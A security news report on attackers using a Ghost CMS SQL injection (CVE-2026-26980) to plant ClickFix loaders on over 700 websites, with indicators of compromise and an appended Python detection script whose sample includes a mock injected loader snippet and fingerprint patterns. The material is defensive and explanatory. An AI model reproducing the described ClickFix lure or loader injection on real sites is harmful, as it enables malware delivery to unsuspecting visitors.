
Hackers Exploit Ghost CMS CVE-2026-26980 to Poison 700 Websites With ClickFix Malware

Cybersecurity News · Archived May 26, 2026




Cyber Security News
By Tushar Subhra Dutta, May 26, 2026

A critical SQL injection flaw in Ghost CMS has been weaponized by at least two threat actor groups to silently poison over 700 websites with ClickFix malware, putting unsuspecting visitors at serious risk. The vulnerability, tracked as CVE-2026-26980, was publicly disclosed as early as February 19, 2026. Despite this, many Ghost CMS administrators failed to apply the available patch in time. Attackers wasted little time, scanning for unpatched installations, stealing Admin API keys, and mass-modifying article content to serve malicious JavaScript loaders to anyone who visited those sites.

Researchers at Qianxin XLab first detected the poisoning activity on May 7, 2026, while investigating a compromise at one of their critical customers. Qianxin said in a report shared with Cyber Security News that what initially appeared to be a targeted intrusion turned out to be a broad, automated campaign hitting Ghost CMS installations worldwide. The attack chain was described as systematic, covering CMS takeover, page poisoning, two-stage payload loading, social engineering, and final malware delivery.

The scope of damage expanded rapidly. By May 10, researchers had confirmed 156 poisoned domains. One week later, that number had ballooned to over 700, including websites operated by Harvard University, Oxford University, and Auburn University. The affected sites span dozens of industries, including blockchain, AI, media, fintech, and security research.

What makes this campaign particularly dangerous is the level of trust users place in well-known websites. Visitors to compromised Ghost sites had no visible warning signs.

[Figure: Ghost CMS Poisoning Incident Timeline (Source – Qianxin)]

The poisoned articles looked completely normal, with the malicious code silently embedded at the bottom of each page, waiting to activate when a reader scrolled through.

Hackers Exploit Ghost CMS CVE-2026-26980

The vulnerability at the center of this campaign is a high-risk SQL injection flaw in Ghost CMS that allows unauthenticated attackers to read directly from the database, including the Admin API Key. With that key in hand, attackers could call the Ghost Admin API to silently rewrite articles at scale, with no need to touch the admin panel or the server directly.

CVE ID: CVE-2026-26980
Type: SQL Injection
Severity: High
Affected Component: Ghost CMS
Impact: Unauthenticated Admin API Key extraction, mass article modification

Once the malicious JavaScript loader was planted, the attack unfolded in four stages. Stage one dropped the loader at the bottom of articles. Stage two redirected real visitors through a cloaking script that filtered out security researchers and bots. Stage three presented a convincing fake Cloudflare verification page, tricking users into pressing WIN+R, pasting a command, and hitting Enter. Stage four silently delivered and executed a data-stealing payload on the victim's machine.

[Figure: More than 700 domains that have been poisoned (Source – Qianxin)]

ClickFix Social Engineering and Payload Delivery

The fake verification page is what makes this campaign so effective against ordinary users. It mimics the widely recognized Cloudflare CAPTCHA interface down to the visual styling and wording. When users click to verify, they unknowingly copy a malicious command to their clipboard and execute it themselves, all while believing they are simply proving they are human.

The payloads evolved as the campaign progressed. Early versions downloaded a DLL named installer.dll via a public CDN and launched it quietly using rundll32.
By May 16, attackers had upgraded to a zero-detection data-stealing Trojan called UtilifySetup.exe, which used an Electron-based framework to establish persistence and contact a command-and-control server every 30 seconds.

[Figure: Attack Chain (Source – Qianxin)]

A second threat actor group was also found running a parallel campaign through a loader delivered via NotepadPlusPlus.zip.

Qianxin XLab strongly recommends that all Ghost CMS administrators upgrade immediately to the patched version that resolves CVE-2026-26980. Beyond upgrading, site owners should rotate all credentials, including Admin API keys and administrator passwords, audit access logs for unusual bulk PUT requests, and scan article content for fingerprints such as ghost_once_footer_ or atob( combined with appendChild. Visitors who may have accessed any affected Ghost site during the contamination window should run a full local security check on their devices.

Indicators of Compromise (IoCs)

File names and injected-code fingerprints reported by Qianxin:

File Name – installer.dll – Rust-based DLL loader dropped to %TEMP%
File Name – update.bat – Batch script for payload execution
File Name – NotepadPlusPlus.dll – Renamed installer DLL (Stage 2)
File Name – UtilifySetup.exe – Final Electron-based data-stealing Trojan payload
File Name – notepadplusplus.js – JavaScript variant of loader (May 18 wave)
Injected Code Pattern – ghost_once_footer_ – Threat Actor A fingerprint in poisoned article content
Injected Code Pattern – sj.ssc/ipa/ – Threat Actor B fingerprint in poisoned article content
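The two defensive checks recommended above, auditing access logs for bulk PUT requests and scanning article content for the loader fingerprints, as an added example that is not part of the article or of Qianxin's report. It assumes Ghost's Admin API post-edit path `/ghost/api/admin/posts/` and combined-format web server access logs; the sample article HTML and log lines are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Article-content fingerprints named in the report: Threat Actor A's marker, the
# atob(...) + appendChild loader idiom, and Threat Actor B's reversed "/api/css.js".
FINGERPRINTS = {
    "ghost_once_footer": re.compile(r"ghost_once_footer_"),
    "atob_appendChild": re.compile(r"atob\s*\(.*?appendChild", re.S),
    "reversed_css_js": re.compile(r"sj\.ssc/ipa/"),
}
# Assumed Ghost Admin API path for post edits; bulk rewrites arrive as PUTs here.
ADMIN_POSTS = "/ghost/api/admin/posts/"
# Combined-log-format prefix: ip ident user [time] "METHOD path proto"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*"')

def scan_article(html: str) -> list[str]:
    """Return the names of fingerprints present in one article's HTML."""
    return [name for name, rx in FINGERPRINTS.items() if rx.search(html)]

def bulk_put_sources(lines, threshold=10, window=timedelta(minutes=5)) -> dict[str, int]:
    """Return {ip: peak} for IPs whose admin post PUTs peak at >= threshold in any window."""
    per_ip = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if m and m[3] == "PUT" and m[4].startswith(ADMIN_POSTS):
            per_ip[m[1]].append(datetime.strptime(m[2], "%d/%b/%Y:%H:%M:%S %z"))
    flagged = {}
    for ip, times in per_ip.items():
        times.sort()
        start = peak = 0
        for end, t in enumerate(times):  # sliding window over sorted timestamps
            while t - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged

# Constructed sample input (not from the report): one poisoned article and a burst of edits.
SAMPLE_HTML = ('<p>Real article text.</p><script id="ghost_once_footer_x">'
               'var s=document.createElement("script");s.src=atob("aHR0cHM6Ly9leGFtcGxlLmludmFsaWQv");'
               'document.body.appendChild(s);</script>')
SAMPLE_LOG = [f'203.0.113.5 - - [16/May/2026:10:00:{i:02d} +0000] "PUT {ADMIN_POSTS}{i:024x}/ HTTP/1.1" 200 512'
              for i in range(12)]
SAMPLE_LOG.append('198.51.100.7 - - [16/May/2026:10:30:00 +0000] "PUT /ghost/api/admin/posts/abc/ HTTP/1.1" 200 512')

if __name__ == "__main__":
    print(scan_article(SAMPLE_HTML), bulk_put_sources(SAMPLE_LOG))  # ['ghost_once_footer', 'atob_appendChild'] {'203.0.113.5': 12}
```

A single legitimate edit from a second address is not flagged, while twelve edits from one address inside five minutes is; tune the threshold and window to the site's normal editorial cadence.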